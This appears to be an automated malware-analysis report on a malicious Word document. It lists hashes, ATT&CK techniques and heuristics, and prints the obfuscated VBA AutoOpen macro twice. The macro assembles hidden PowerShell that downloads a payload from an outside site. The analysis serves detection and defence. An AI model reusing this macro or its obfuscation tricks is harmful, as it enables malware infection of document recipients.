Office (OLE) malware analysis — malicious · 478195c76979b58e

MALICIOUS

Office (OLE)

199.5 KB Created: 2017-12-22 18:13:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: 4926ddaa8fe8d05f2c8f9e4fac1ce859 SHA-1: 270c54fb2df972c8c316c7aae4eba27e6df71f3c SHA-256: 478195c76979b58ebd46305ffaa034ddfa29bf29e61273b4a4256bd113e078c2

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands, likely for downloading and running a second-stage payload. The large slack space in the OLE structure is also a suspicious indicator.

Heuristics 6

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 204,288 bytes but its declared streams total only 15,693 bytes — 188,595 bytes (92%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 73661 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	73661 bytes
SHA-256: `9e8ebc2710ebb7837ac8751cd690f7500fce4b85cf18aca72122d93dfc805008`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "IGVtNnN" Sub AutoOpen() On Error Resume Next BmJXTGpDW = 871 / Rnd(4) + LVoUOkDb + OwHlIcRhkd * 9 + Int(WlWsJDOcwTzUbj * CStr(sFjHjvuSvQtA)) + uCYEaYn * CDate(3624 - 352183467 * 84 / 475) / wvKLWbdBQb - CSng(620) jBakLwdtC = 871 / Rnd(4) + TbbQCMiwutu + wHtKYvN * 9 + Int(QRipNzaKqa * CStr(jVLGXTuIJtj)) + XhdESqB * CDate(3624 - 352183467 * 84 / 475) / hfiLCzmDDlX - CSng(620) FUSNhlBWq = 871 / Rnd(4) + nEbjKGHjuIU + ztBnzEZjqFXVb * 9 + Int(FUwSRTKvubGb * CStr(qfTIdCQUZMtlw)) + JnijFIZBnncqAi * CDate(3624 - 352183467 * 84 / 475) / zZjYNjB - CSng(620) WwtTKQfHD = 871 / Rnd(4) + UXAHLvBSSprj + nBlQamMNjNH * 9 + Int(lmmwIVfkv * CStr(diwnifGutK)) + QGRYAFVqTlJsq * CDate(3624 - 352183467 * 84 / 475) / IPUKTLwlRXH - CSng(620) TnIhHoUza = 871 / Rnd(4) + fUZHPKtbkU + GMVPlkZwtfpt * 9 + Int(hSMIMwpvP * CStr(cuuCEBC)) + hDWNamRV * CDate(3624 - 352183467 * 84 / 475) / uwhpqbJ - CSng(620) Application.Run "BJYBUhqczCNfwY", KLKDrCQ azwlOnfpq = 871 / Rnd(4) + tVriVzqV + puUsZqrs * 9 + Int(wiPlSlcGDRvtYj * CStr(StwdVYBqUj)) + PGEYuXuktHsH * CDate(3624 - 352183467 * 84 / 475) / GGOuZZN - CSng(620) RNzaftNXW = 871 / Rnd(4) + suChWVCiWYzonP + mtXPKHRvVT * 9 + Int(JitBJXO * CStr(PwEVkkMPDBOdah)) + szqHLna * CDate(3624 - 352183467 * 84 / 475) / jNUMXlVPcaozbh - CSng(620) YmfzsNtHq = 871 / Rnd(4) + bdABSPCLowY + PXodhmlD * 9 + Int(iZLbEcOvMFZW * CStr(lulUwNYdKcJQWH)) + OjHVnosE * CDate(3624 - 352183467 * 84 / 475) / ZOmnQbtwlVlus - CSng(620) NpYfIXwBK = 871 / Rnd(4) + UFjjwDjFtpwu + akMijLfBWOVS * 9 + Int(zIfUHnOjR * CStr(jvuuCQsEwSGz)) + vpNqfjwqKNjGbZ * CDate(3624 - 352183467 * 84 / 475) / hIfBJBdnoQ - CSng(620) dkdKZALzN = 871 / Rnd(4) + fuzjATsYhOoa + TXnmFotSBYaCv * 9 + Int(flNVHNptmK * CStr(ApIEGZbCsKnlNF)) + URiWXjEz * CDate(3624 - 352183467 * 84 / 475) / nTthNBak - CSng(620) End Sub Function KLKDrCQ() On Error Resume Next VvNMEEdkI = 871 / Rnd(4) + wfnkGwkIlsjpCH + bTIdvdkASqXEwK * 9 + Int(MODZlrwtmhj * CStr(tzvKzmXM)) + GiwVOfVuitl * CDate(3624 - 352183467 * 84 / 475) / JfVldWGdZVwOSq - CSng(620) zuwzA = 871 / Rnd(4) + FZcUaoKqkd + qCtPVDuOXlaj * 9 + Int(DHITKkasVNwBJM * CStr(PrwqawTwXbavXk)) + misfQSfrfA * CDate(3624 - 352183467 * 84 / 475) / uVovOMr - CSng(620) dvTYaXc = Mid("mujGr85E872FEX'a.t7EV+7EVk/U7EV+7EVbsnq'+'7'+'EV+7EVt/'+',http:/7EV+Fn4+Fn47EV/w7EV+7EVw7EV+7EVw.cola-i7EV+7EVnfo.7EV+7'+'EVnl/Ts7EV+7EVZ7EV+7EVF2FNtRJ", 15, 131) UXZfwNKSibv = 871 / Rnd(4) + WjXSbzz + fHDXMcz * 9 + Int(nuMkTaY * CStr(QQjClmhDXd)) + OKbKBJZpiawtAZ * CDate(3624 - 352183467 * 84 / 475) / ITGGhwHCB - CSng(620) bUCCvIUuhz = 871 / Rnd(4) + XOonoUSNMowh + BkHqsBpNJrE * 9 + Int(uXPWuJmKAXSz * CStr(YlSZRjDjjC)) + jlmjwVOXkEuzCq * CDate(3624 - 352183467 * 84 / 475) / fKXidRIRT - CSng(620) RnZcYT = 871 / Rnd(4) + NzUsZAzj + ltLjLatktvR * 9 + Int(jcUiOwQvCG * CStr(ZAnMFzFa)) + KWoXwjvjoLNGkm * CDate(3624 - 352183467 * 84 / 475) / UAOLDjncilm - CSng(620) LIIwFOkCQf = Mid("G2Wr5jchAR]39) \|.( $psHoMe[21]+$PShome[30]UzqiQ9GKHwD1qoRpijfkJPlc", 7, 36) iohZImz = 871 / Rnd(4) + WnrKBCNUQ + IXCNiJvPUioPj * 9 + Int(BsIBYhXUSTahWM * CStr(BjcmzKIIKzTW)) + zpbHEsJItMwjS * CDate(3624 - 352183467 * 84 / 475) / EjnzmijSzLdjo - CSng(620) BWoHCkadP = 871 / Rnd(4) + hCjYJGVQkDR + ZMTLTDWasPfK * 9 + Int(rEzSpzJPPdZP * CStr(MLWTrmroOotwWa)) + dhSWYqSBXw * CDate(3624 - 352183467 * 84 / 475) / FHWKjtvUqLEZXt - CSng(620) GQaCuRZF = 871 / Rnd(4) + kwBFKiWcsSdiD + IUjChVDYWC * 9 + Int(oMfsPdUEPYvK * CStr(ZoRcrUTIiGKcf)) + CSqLczXVRrj * CDate(3624 - 352183467 * 84 / 475) / pJZnBMKpdsD - CSng(620) OYjPztlQWdm = Mid("thwm7GYKVEMzFnh,Fn4resFn4).ReplAce(([ChAr]'+'52+[ChAr]7'+'0+[ChAr]89),Fn4SfhFn4))') -rePLACE 'res',[chAR]124-rePLACE ([chAR]83+[chAR]102+[chAR]104),[chAR]36-CrEplAcE 'Fn4',[VzmCXKb0v0", 16, 162) hdkwI = 871 / Rnd(4) + tdQDTTWom + KCqItKwVvj ... (truncated)

SHA-256: 9e8ebc2710ebb7837ac8751cd690f7500fce4b85cf18aca72122d93dfc805008

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IGVtNnN"
Sub AutoOpen()
On Error Resume Next
BmJXTGpDW = 871 / Rnd(4) + LVoUOkDb + OwHlIcRhkd * 9 + Int(WlWsJDOcwTzUbj * CStr(sFjHjvuSvQtA)) + uCYEaYn * CDate(3624 - 352183467 * 84 / 475) / wvKLWbdBQb - CSng(620)
jBakLwdtC = 871 / Rnd(4) + TbbQCMiwutu + wHtKYvN * 9 + Int(QRipNzaKqa * CStr(jVLGXTuIJtj)) + XhdESqB * CDate(3624 - 352183467 * 84 / 475) / hfiLCzmDDlX - CSng(620)
FUSNhlBWq = 871 / Rnd(4) + nEbjKGHjuIU + ztBnzEZjqFXVb * 9 + Int(FUwSRTKvubGb * CStr(qfTIdCQUZMtlw)) + JnijFIZBnncqAi * CDate(3624 - 352183467 * 84 / 475) / zZjYNjB - CSng(620)
WwtTKQfHD = 871 / Rnd(4) + UXAHLvBSSprj + nBlQamMNjNH * 9 + Int(lmmwIVfkv * CStr(diwnifGutK)) + QGRYAFVqTlJsq * CDate(3624 - 352183467 * 84 / 475) / IPUKTLwlRXH - CSng(620)
TnIhHoUza = 871 / Rnd(4) + fUZHPKtbkU + GMVPlkZwtfpt * 9 + Int(hSMIMwpvP * CStr(cuuCEBC)) + hDWNamRV * CDate(3624 - 352183467 * 84 / 475) / uwhpqbJ - CSng(620)
Application.Run "BJYBUhqczCNfwY", KLKDrCQ
azwlOnfpq = 871 / Rnd(4) + tVriVzqV + puUsZqrs * 9 + Int(wiPlSlcGDRvtYj * CStr(StwdVYBqUj)) + PGEYuXuktHsH * CDate(3624 - 352183467 * 84 / 475) / GGOuZZN - CSng(620)
RNzaftNXW = 871 / Rnd(4) + suChWVCiWYzonP + mtXPKHRvVT * 9 + Int(JitBJXO * CStr(PwEVkkMPDBOdah)) + szqHLna * CDate(3624 - 352183467 * 84 / 475) / jNUMXlVPcaozbh - CSng(620)
YmfzsNtHq = 871 / Rnd(4) + bdABSPCLowY + PXodhmlD * 9 + Int(iZLbEcOvMFZW * CStr(lulUwNYdKcJQWH)) + OjHVnosE * CDate(3624 - 352183467 * 84 / 475) / ZOmnQbtwlVlus - CSng(620)
NpYfIXwBK = 871 / Rnd(4) + UFjjwDjFtpwu + akMijLfBWOVS * 9 + Int(zIfUHnOjR * CStr(jvuuCQsEwSGz)) + vpNqfjwqKNjGbZ * CDate(3624 - 352183467 * 84 / 475) / hIfBJBdnoQ - CSng(620)
dkdKZALzN = 871 / Rnd(4) + fuzjATsYhOoa + TXnmFotSBYaCv * 9 + Int(flNVHNptmK * CStr(ApIEGZbCsKnlNF)) + URiWXjEz * CDate(3624 - 352183467 * 84 / 475) / nTthNBak - CSng(620)
End Sub
Function KLKDrCQ()
On Error Resume Next
VvNMEEdkI = 871 / Rnd(4) + wfnkGwkIlsjpCH + bTIdvdkASqXEwK * 9 + Int(MODZlrwtmhj * CStr(tzvKzmXM)) + GiwVOfVuitl * CDate(3624 - 352183467 * 84 / 475) / JfVldWGdZVwOSq - CSng(620)
zuwzA = 871 / Rnd(4) + FZcUaoKqkd + qCtPVDuOXlaj * 9 + Int(DHITKkasVNwBJM * CStr(PrwqawTwXbavXk)) + misfQSfrfA * CDate(3624 - 352183467 * 84 / 475) / uVovOMr - CSng(620)
dvTYaXc = Mid("mujGr85E872FEX'a.t7EV+7EVk/U7EV+7EVbsnq'+'7'+'EV+7EVt/'+',http:/7EV+Fn4+Fn47EV/w7EV+7EVw7EV+7EVw.cola-i7EV+7EVnfo.7EV+7'+'EVnl/Ts7EV+7EVZ7EV+7EVF2FNtRJ", 15, 131)
UXZfwNKSibv = 871 / Rnd(4) + WjXSbzz + fHDXMcz * 9 + Int(nuMkTaY * CStr(QQjClmhDXd)) + OKbKBJZpiawtAZ * CDate(3624 - 352183467 * 84 / 475) / ITGGhwHCB - CSng(620)
bUCCvIUuhz = 871 / Rnd(4) + XOonoUSNMowh + BkHqsBpNJrE * 9 + Int(uXPWuJmKAXSz * CStr(YlSZRjDjjC)) + jlmjwVOXkEuzCq * CDate(3624 - 352183467 * 84 / 475) / fKXidRIRT - CSng(620)
RnZcYT = 871 / Rnd(4) + NzUsZAzj + ltLjLatktvR * 9 + Int(jcUiOwQvCG * CStr(ZAnMFzFa)) + KWoXwjvjoLNGkm * CDate(3624 - 352183467 * 84 / 475) / UAOLDjncilm - CSng(620)
LIIwFOkCQf = Mid("G2Wr5jchAR]39) |.( $psHoMe[21]+$PShome[30]UzqiQ9GKHwD1qoRpijfkJPlc", 7, 36)
iohZImz = 871 / Rnd(4) + WnrKBCNUQ + IXCNiJvPUioPj * 9 + Int(BsIBYhXUSTahWM * CStr(BjcmzKIIKzTW)) + zpbHEsJItMwjS * CDate(3624 - 352183467 * 84 / 475) / EjnzmijSzLdjo - CSng(620)
BWoHCkadP = 871 / Rnd(4) + hCjYJGVQkDR + ZMTLTDWasPfK * 9 + Int(rEzSpzJPPdZP * CStr(MLWTrmroOotwWa)) + dhSWYqSBXw * CDate(3624 - 352183467 * 84 / 475) / FHWKjtvUqLEZXt - CSng(620)
GQaCuRZF = 871 / Rnd(4) + kwBFKiWcsSdiD + IUjChVDYWC * 9 + Int(oMfsPdUEPYvK * CStr(ZoRcrUTIiGKcf)) + CSqLczXVRrj * CDate(3624 - 352183467 * 84 / 475) / pJZnBMKpdsD - CSng(620)
OYjPztlQWdm = Mid("thwm7GYKVEMzFnh,Fn4resFn4).ReplAce(([ChAr]'+'52+[ChAr]7'+'0+[ChAr]89),Fn4SfhFn4))')  -rePLACE  'res',[chAR]124-rePLACE  ([chAR]83+[chAR]102+[chAR]104),[chAR]36-CrEplAcE  'Fn4',[VzmCXKb0v0", 16, 162)
hdkwI = 871 / Rnd(4) + tdQDTTWom + KCqItKwVvj
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.